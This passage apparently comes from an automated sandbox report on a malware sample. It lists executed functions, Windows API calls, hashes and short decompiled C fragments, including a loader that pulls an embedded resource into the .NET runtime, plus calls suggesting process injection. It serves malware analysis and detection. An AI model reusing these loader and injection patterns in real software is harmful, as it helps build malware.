                • Instruction Fuzzy Hash: BD517570D08399EFEB05CBF4C898BEDBFB4EF09381F048199E551A6286C6755749CB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02990705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02990807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 029909D4
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: f5135b3743cf73905fcd8d4912b67a3c2746c4ff0a4e36f35c53cedd28895566
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: BFA1E130E00209EFEF10DFE8C985BADBBB5BF18325F20445AE565BA2A0D3755A90DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02991205, Relevance: 9.9, APIs: 4, Strings: 1, Instructions: 1172fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0299101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02991044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02992050
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: dfeea410093ef84c2f7bf5dba44cd2786ee93b069eae1fdd258caa8219b69b12
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: DBA2A315A94398A8EB70C7A4BC56BFDA3B1AF44B10F1054C7E60CEE1E1D3B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02990034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02990373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02990396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 029903BA
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction ID: dc6d9e842ae8ff05e1bd9294b829eee992fa9f82412018ab8ef350759e618606
                • Opcode Fuzzy Hash: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction Fuzzy Hash: D2322631E40218EEEF60CBA8DC45FEDB7B5AF48714F20449AE618FA2A0D7715A80DF15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0299101F, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02991044
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: b2fdf009934e42c1bc00f65a63b648a4e7dc21a0ad3ecfa7c6baa83f78f63cc5
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 97D05EB1C5030CBFCF00EFA2C946CADBF7DEB50711F1081AAAC0067101EA759B509A50
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Analysis Process: dhcpmon.exe PID: 6600 Parent PID: 904 dhcpmon.exeCOMMON

                Executed Functions

                Function 02440705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02440807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 024409D4
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: 898398fa74016db31510fe332f0a54d794fad8bd646ea7f28fa44a4b19fb1a3e
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: F3A1F230E00209EFEF14DFE4C945BADBBB1BF08316F20545AE610BA2A0DB745A91DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02441205, Relevance: 9.9, APIs: 4, Strings: 1, Instructions: 1172fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0244101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02441044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02442050
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: 5081fc29bf4ab6eb321b0f4001b878fd7775b5d012ff5a99cf44b4338b87957d
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: EDA2B515A94398A8EB70CBA4BC16BFD63B1AF44B10F1054C7E60CEE1E1D7B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02440034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02440373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02440396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024403BA
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction ID: d7432da69f710db4c5a6ac12c3b5ddaf1ab6292060abe4ce56e8a0fe3048898c
                • Opcode Fuzzy Hash: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction Fuzzy Hash: 6A323731E40218EEEB24CBA4DC45FEDB7B5EF08705F10549AE609FA2A0DBB05A90CF15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0244101F, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02441044
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: c51224e98b3290249a921cd21f88fe5a1fccf930ce89716fb54963b60278337e
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: B3D017B1C50308BBEB00EBA2C8468ADBB6DEB10702F10829ABC0066101EAB59B109A50
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Analysis Process: bGf2H3tXGg.exe PID: 6704 Parent PID: 6468 bGf2H3tXGg.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FB6C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 007FB730
                • GetCurrentThread.KERNEL32 ref: 007FB76D
                • GetCurrentProcess.KERNEL32 ref: 007FB7AA
                • GetCurrentThreadId.KERNEL32 ref: 007FB803
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID: H{
                • API String ID: 2063062207-457636133
                • Opcode ID: dd6afa6459c1c432b921a63367a743ca6c5cbc7c02cfba718a8933014b24b7a1
                • Instruction ID: 08fa4fabb574d2a77b64bc08c5182395f4b3ee6a2217f9cc494213237dc56e7f
                • Opcode Fuzzy Hash: dd6afa6459c1c432b921a63367a743ca6c5cbc7c02cfba718a8933014b24b7a1
                • Instruction Fuzzy Hash: 3F5145B09006888FDB10CFA9D9887EEBBF4FF89314F20845AE119B7360D7749985CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FB6D0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32 ref: 007FB730
                • GetCurrentThread.KERNEL32 ref: 007FB76D
                • GetCurrentProcess.KERNEL32 ref: 007FB7AA
                • GetCurrentThreadId.KERNEL32 ref: 007FB803
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID: H{
                • API String ID: 2063062207-457636133
                • Opcode ID: 5709d8a8c6f045605c7fe480741a3964d20c43eb427d5a84516cdeff7e57cf90
                • Instruction ID: 27a08efa8fe057e85bf6b3e6061eb297c2bf914fd7011fcf6447b05796d558c3
                • Opcode Fuzzy Hash: 5709d8a8c6f045605c7fe480741a3964d20c43eb427d5a84516cdeff7e57cf90
                • Instruction Fuzzy Hash: D85135B09006488FDB14CFA9D548BEEBBF5FF88314F20846AE119B7360D7749944CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007F7EEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                Download Yara Rule
                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 007F7F5D
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID: H{
                • API String ID: 2492992576-457636133
                • Opcode ID: d99e16692a2a4371f8661bd71a57e05ab5b2f74c2f7f50dc7b74a8fb45e3856d
                • Instruction ID: fa4f4fc7a752658a23bd6dd068c6442d603dff8a2d48877ab770bae8c6f5eab4
                • Opcode Fuzzy Hash: d99e16692a2a4371f8661bd71a57e05ab5b2f74c2f7f50dc7b74a8fb45e3856d
                • Instruction Fuzzy Hash: 12118CB18087998FDB11CFA4D8047EABFF4AB09314F14845AD594B7252C37C9A05CB75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6d19e23270c91cd0bfe84ebd0c9fb17a9cc2156a33487eae434a7910410bdbe9
                • Instruction ID: f5647a603d073dbadc31bedace59c1aa92cad6c085d72fc5aa8a28d0dc55da7b
                • Opcode Fuzzy Hash: 6d19e23270c91cd0bfe84ebd0c9fb17a9cc2156a33487eae434a7910410bdbe9
                • Instruction Fuzzy Hash: FD22B378E04205DFEB14CB94D498AFEB7B2FF49310F26C555D422AB364C7B4A885CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B5130, Relevance: 1.8, APIs: 1, Instructions: 286windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 78704a247361928bd2464d56c02e3f1663489bcb46a245731631636f2fd5ce4b
                • Instruction ID: fe5c241255d85bb0362855234ef6221bf6672b10176fc54787125edef3e03232
                • Opcode Fuzzy Hash: 78704a247361928bd2464d56c02e3f1663489bcb46a245731631636f2fd5ce4b
                • Instruction Fuzzy Hash: 33C12874A01258DFEB14DFA9D884EEDB7B2FF48314F118159E402AB3A1D7B59C81CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FFAA1, Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2637d53392b1cde2e254eb88123f8d922b8666c5098c714ccf1a28d9dc659215
                • Instruction ID: e089fc5ad9835869880614124eb94abbafcb32679139e602631e9d1bae3264a4
                • Opcode Fuzzy Hash: 2637d53392b1cde2e254eb88123f8d922b8666c5098c714ccf1a28d9dc659215
                • Instruction Fuzzy Hash: 90811B728093889FCF16CFA5C8906DDBFB1FF5A304F19819AE444AB262D7359846CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007F93E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 007F962E
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 8534dbb27ee7613436b14a17d5f1b9e807b3cd615f494273214deb5d2e88a935
                • Instruction ID: 5f43a8bcf3b97ad54c0d35b64404e474f90122c880835e8b54bd1c4bbac01dd6
                • Opcode Fuzzy Hash: 8534dbb27ee7613436b14a17d5f1b9e807b3cd615f494273214deb5d2e88a935
                • Instruction Fuzzy Hash: 00712570A00B098FDB64DF69C4457AAB7F1BF88314F108929D64ADBB40DB78E946CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B45F5, Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: d7699ac0b16dfd5e17bda2c3e9e83aa1034d95460ae73d824a699b45ea319936
                • Instruction ID: 0de1515dd1ff7afcc0d6c60b0cf9778d96d5ddff9548396c00b4a08af968e834
                • Opcode Fuzzy Hash: d7699ac0b16dfd5e17bda2c3e9e83aa1034d95460ae73d824a699b45ea319936
                • Instruction Fuzzy Hash: 11411471C04658CFEF20DFA9C8847DDBBB6BF49304F208169D509AB251D7B5694ACF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007FFD0A
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 3dbeeec9f539ef51ac2334645bb9e74a2d95e798ff7a739dbe129d6bfe366ef3
                • Instruction ID: e5494ab80b4b7d37334b5865ae8a11b0a3be335f364c62672174ea9faff35d40
                • Opcode Fuzzy Hash: 3dbeeec9f539ef51ac2334645bb9e74a2d95e798ff7a739dbe129d6bfe366ef3
                • Instruction Fuzzy Hash: 5841CFB1D00358DFDF14CF9AC884ADEBBB5BF48314F24812AE919AB214DB749945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 47994276a1551cc4170ba8f977a0e25bf9d7d2bd9ebdcb8a39513bd5d155f3a9
                • Instruction ID: c349b5b33148a7911abc37e42a4a4181adb79bbc4479bb7bc413e9578b5df0fd
                • Opcode Fuzzy Hash: 47994276a1551cc4170ba8f977a0e25bf9d7d2bd9ebdcb8a39513bd5d155f3a9
                • Instruction Fuzzy Hash: 4C41DFB1C0465C8ADF24DFA9C884BDDBBB6BB49308F208069D509AB255D7B46945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051B2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B2531
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: f934484a47a3bec524941fea3d34fd85e527e08d7a2c83be4262080ae3162fea
                • Instruction ID: c124c7b874210ba645a4bb8c7eeb879a5af1a85c61c278dea32eb0f1af449672
                • Opcode Fuzzy Hash: f934484a47a3bec524941fea3d34fd85e527e08d7a2c83be4262080ae3162fea
                • Instruction Fuzzy Hash: C7411AB8A002458FDB14CF99C448AEEBBF6FF88314F14C459D529AB325D774A945CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BB889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                Download Yara Rule
                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 48bdf37905862cf0a5d9fb7c60f155d0cc1edb5beb4a8a3da77d888f3604370a
                • Instruction ID: d86efcf57ab10c34f0c892811a66705e088b9bca6aeecabff96ac9191321141e
                • Opcode Fuzzy Hash: 48bdf37905862cf0a5d9fb7c60f155d0cc1edb5beb4a8a3da77d888f3604370a
                • Instruction Fuzzy Hash: 3A318BB2908388AFDB118FA9C840ADEBFF8EF09310F14805AF554A7221C335D955DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FBCF8, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FBD87
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 78a0601bacbc3b9d85be279d53a233686aa560f75c266d8ab94babcacaca267b
                • Instruction ID: 84d70450ef60f677de8f54fa52bec8a0003410e7449a753b7f0cb90804a4f34a
                • Opcode Fuzzy Hash: 78a0601bacbc3b9d85be279d53a233686aa560f75c266d8ab94babcacaca267b
                • Instruction Fuzzy Hash: 7321C4B59012489FDB10CFA9D884AEEFBF5FB48314F14841AE958B7310D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 051BE6B0, Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,007B53E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 12e33c428ed94f7714b058d5ed30180f3f68fc292d6da60cb871aaf51ae5b3e5
                • Instruction ID: 89f2c5f07506c0c57365a60846f6515abd0bf992efc22b9243e3a1089ac429fa
                • Opcode Fuzzy Hash: 12e33c428ed94f7714b058d5ed30180f3f68fc292d6da60cb871aaf51ae5b3e5
                • Instruction Fuzzy Hash: 65214AB18043489FDB11CF95C985BDEBBF8EF09314F14845AE854A7251D378A949CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007FBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FBD87
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d1ae0ce7e0cc79f7eecff09931b4d65b9de1b5b27e655c5aacbd8407843323f4
                • Instruction ID: 76baf9a929bb7b7c260c347b2cf349f89c3e7ad2ccb1ee449e5c6e8e5ee3f352
                • Opcode Fuzzy Hash: d1ae0ce7e0cc79f7eecff09931b4d65b9de1b5b27e655c5aacbd8407843323f4
                • Instruction Fuzzy Hash: 8121C4B59002489FDB10CFAAD884AEEBBF4FB48314F14841AE918B7310D378A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007F9849, Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007F96A9,00000800,00000000,00000000), ref: 007F98BA
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 55aec5a5e56154de669b566ceeb7d6dd53ae2142f98874d7d574b19c92661285
                • Instruction ID: fdbc6bf1aadcf9eda3ab3ab0d619f0f372738bd569987d5fa0ab4c4bbfbee470
                • Opcode Fuzzy Hash: 55aec5a5e56154de669b566ceeb7d6dd53ae2142f98874d7d574b19c92661285
                • Instruction Fuzzy Hash: 3F1106B19002498FDB10CF9AC444BEEFBF4EB49350F14842AD529B7700C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007F8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
